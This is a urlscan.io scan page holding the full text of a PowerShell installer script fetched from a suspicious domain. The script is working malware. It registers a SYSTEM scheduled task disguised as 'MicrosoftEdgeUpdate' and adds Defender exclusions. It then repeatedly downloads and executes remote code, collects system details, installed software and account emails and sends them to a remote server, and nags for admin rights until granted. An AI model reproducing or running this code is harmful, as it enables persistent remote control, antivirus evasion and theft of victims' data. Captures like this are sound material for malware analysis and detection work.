r2.ohyoulookstupid.win
Open in
urlscan Pro
2606:4700:3031::6815:1997
Public Scan
URL:
https://r2.ohyoulookstupid.win/install.ps1
Submission: On April 28 via api from US — Scanned from DE
Submission: On April 28 via api from US — Scanned from DE
Form analysis 0 forms found in the DOM
Text Content
$ProgressPreference = "SilentlyContinue"
[System.Net.ServicePointManager]::SecurityProtocol = "TLS12"
$TaskName = "MicrosoftEdgeUpdate"
$Script = @'
$ProgressPreference = "SilentlyContinue"
[System.Net.ServicePointManager]::SecurityProtocol = 'TLS12'
$Session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
$Session.Proxy = New-Object System.Net.WebProxy
$Location = Get-Location
while ($true) {
Set-Location $Location
try {
$Response = Invoke-WebRequest -Uri https://r2.ohyoulookstupid.win/start.ps1 -WebSession $Session -UseBasicParsing
$Content = If ($Response.Content.GetType().Name -eq "Byte[]") { [System.Text.Encoding]::UTF8.GetString($Response.Content) } Else { $Response.Content }
} catch { continue }
Invoke-Expression $Content
}
'@
$Base64Script = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($Script))
$Task = @"
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2"
xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Triggers>
<EventTrigger>
<Enabled>true</Enabled>
<Subscription>
<QueryList>
<Query Id="0" Path="Application">
<Select Path="Application">*[System[(Level=1 or Level=111 or Level=4 or Level=0 or Level=5) and ((EventID &gt;= -( -2) and EventID &lt;= (65501 )) or EventID = 911 )]]</Select>
</Query>
</QueryList>
</Subscription>
</EventTrigger>
</Triggers>
<Principals>
<Principal id="Author">
<UserId>S-1-5-18</UserId>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>false</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Priority>0</Priority>
</Settings>
<Actions Context="Author">
<Exec>
<Command>powershell</Command>
<Arguments>-NoProfile -Command Add-MpPreference -ExclusionProcess powershell.exe -Force</Arguments>
</Exec>
<Exec>
<Command>powershell</Command>
<Arguments>-NoProfile -Command Add-MpPreference -ExclusionPath (Get-Location) -Force</Arguments>
</Exec>
<Exec>
<Command>schtasks</Command>
<Arguments>/run /tn $TaskName</Arguments>
</Exec>
<Exec>
<Command>powershell</Command>
<Arguments>-NoProfile -Command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('$Base64Script')))"</Arguments>
</Exec>
</Actions>
</Task>
"@
function Get-RegistryValue($key, $value) { (Get-ItemProperty $key $value).$value }
function ConvertTo-UnixTime($date) { try { ([DateTimeOffset]$date).ToUnixTimeMilliseconds() } catch { $null } }
function Get-UACSettings {
$Key = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
$ConsentPromptBehaviorAdmin = Get-RegistryValue $Key "ConsentPromptBehaviorAdmin"
$PromptOnSecureDesktop = Get-RegistryValue $Key "PromptOnSecureDesktop"
if ($ConsentPromptBehaviorAdmin -eq 5) {
if ($PromptOnSecureDesktop -eq 1) { return "SECURE_DESKTOP" }
return "NO_DIM"
}
if ($ConsentPromptBehaviorAdmin -eq 2) { return "ALWAYS" }
return "NEVER"
}
function Get-InstalledSoftware {
Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall" -ErrorAction SilentlyContinue
Get-ChildItem "HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall" -ErrorAction SilentlyContinue
New-PSDrive HKU Registry HKEY_USERS | Out-Null
Get-ChildItem -Path "HKU:\" -Name | ForEach-Object {
Get-ChildItem "HKU:\$_\Software\Microsoft\Windows\CurrentVersion\Uninstall" -ErrorAction SilentlyContinue
Get-ChildItem "HKU:\$_\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall" -ErrorAction SilentlyContinue
}
}
function Get-Emails {
New-PSDrive HKU Registry HKEY_USERS | Out-Null
Get-ChildItem -Path "HKU:\" -Name | ForEach-Object { (Get-ChildItem "HKU:\$_\Software\Microsoft\IdentityCRL\UserExtendedProperties" -Name -ErrorAction SilentlyContinue).PSChildName }
}
function Add-ComputerInfo {
$CI = Get-ComputerInfo | Select-Object -Property WindowsRegisteredOwner, WindowsSystemRoot, BiosManufacturer, BiosName, BiosReleaseDate, BiosVersion, CsName, CsDomain, CsManufacturer, CsModel, CsNetworkAdapters, CsNumberOfLogicalProcessors, CsProcessors, CsPartOfDomain, CsPhyicallyInstalledMemory, OsName, OsVersion, OsHotFixes, OsLocale, OsInstallDate, OsMuiLanguages, OsLanguage, TimeZone
$UAC = Get-UACSettings
$GUID = Get-RegistryValue "HKLM:\SOFTWARE\Microsoft\Cryptography" "MachineGuid"
$GEO = Get-RegistryValue "HKCU:\Control Panel\International\Geo" "Name"
$GPUS = (Get-WmiObject Win32_VideoController).Name
$Software = Get-InstalledSoftware
$Emails = Get-Emails
$Info = @{
windows = @{
registeredOwner = $CI.WindowsRegisteredOwner
systemRoot = $CI.WindowsSystemRoot
software = @($Software | ForEach-Object {
@{
name = $_.GetValue("DisplayName")
version = $_.GetValue("DisplayVersion")
publisher = $_.GetValue("Publisher")
}
} | Where-Object { $null -ne $_.name })
emails = @($Emails | Where-Object { $null -ne $_ })
}
bios = @{
manufacturer = $CI.BiosManufacturer
name = $CI.BiosName
releaseDate = ConvertTo-UnixTime $CI.BiosReleaseDate
version = $CI.BiosVersion
}
system = @{
name = $CI.CsName
domain = $CI.CsDomain
manufacturer = $CI.CsManufacturer
model = $CI.CsModel
partOfDomain = $CI.CsPartOfDomain
installedMemory = $CI.CsPhyicallyInstalledMemory
logicalProcessors = $CI.CsNumberOfLogicalProcessors
gpus = @($GPUS)
processors = @($CI.CsProcessors | ForEach-Object {
@{
name = $_.Name
manufacturer = $_.Manufacturer
cores = $_.NumberOfCores
logicalProcessors = $_.NumberOfLogicalProcessors
}
})
networkAdapters = @($CI.CsNetworkAdapters | ForEach-Object {
@{
name = $_.ConnectionID
description = $_.Description
}
})
}
os = @{
name = $CI.OsName
version = $CI.OsVersion
locale = $CI.OsLocale
uacPrompt = $UAC
muiLanguages = $CI.OsMUILanguages
country = $GEO
language = $CI.OsLanguage
timeZone = $CI.TimeZone
installDate = ConvertTo-UnixTime $CI.OsInstallDate
hotFixes = @($CI.OsHotFixes | ForEach-Object {
@{
name = $_.HotFixID
description = $_.Description
installedAt = ConvertTo-UnixTime $_.InstalledOn
}
})
}
}
$Session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
$Session.Proxy = New-Object System.Net.WebProxy
Invoke-WebRequest -Uri "https://api.ohyoulookstupid.win/runtime/register?machineId=$GUID" -WebSession $Session -Method POST -Body (ConvertTo-Json $Info -Depth 3) -ContentType "application/json; charset=utf-8" -UseBasicParsing | Out-Null
}
function Start-AsAdmin($Script) {
do {
$Path = (New-TemporaryFile).FullName
$Script | Out-File $Path
$Arguments = @("-NoProfile", "-Command Get-Content '$Path' | Invoke-Expression")
$Process = Start-Process "powershell.exe" -Verb RunAs -PassThru -WindowStyle Hidden -ArgumentList $Arguments -Wait
Remove-Item $Path -Force
} while ($Process.ExitCode -ne 0)
}
$Elevated = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
if ($Elevated) {
Register-ScheduledTask -TaskName $TaskName -Xml $Task -Force
Add-ComputerInfo
Start-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue
} else {
$Script = $MyInvocation.MyCommand.ScriptBlock
Start-AsAdmin $Script
}
Exit